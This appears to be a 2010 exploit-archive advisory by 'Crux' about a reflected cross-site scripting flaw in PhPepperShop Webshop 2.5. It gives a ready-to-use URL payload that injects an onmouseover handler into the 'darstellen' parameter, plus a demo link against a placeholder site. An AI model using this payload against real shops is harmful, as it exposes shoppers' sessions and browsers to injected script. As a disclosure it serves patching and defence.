============================================================================== [~] PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability ============================================================================== [+] My home [ http://hack-tech.com ] [+] Date Submitted: [ January 12 2010 ] [+] Founder: [ Crux ] [+] Vendor: [ http://www.phpeppershop.com/ ] [+] Version: [ 2.5.1 ] [+] Greetz: [ HT Team, All maldivians and my love <3 ] [+] Dork: [ NO NO NO! ] ############################################################################### [ EXPLOIT ] [Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 [ DEMO ] http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 ============================================================================== ############################################################################### ~ There is no right and wrong, There's only fun and boring. :-) ~ Crux ############################################################################### ________________________________ Windows Live Hotmail: Your friends can get your Facebook updates, right from HotmailĀ®.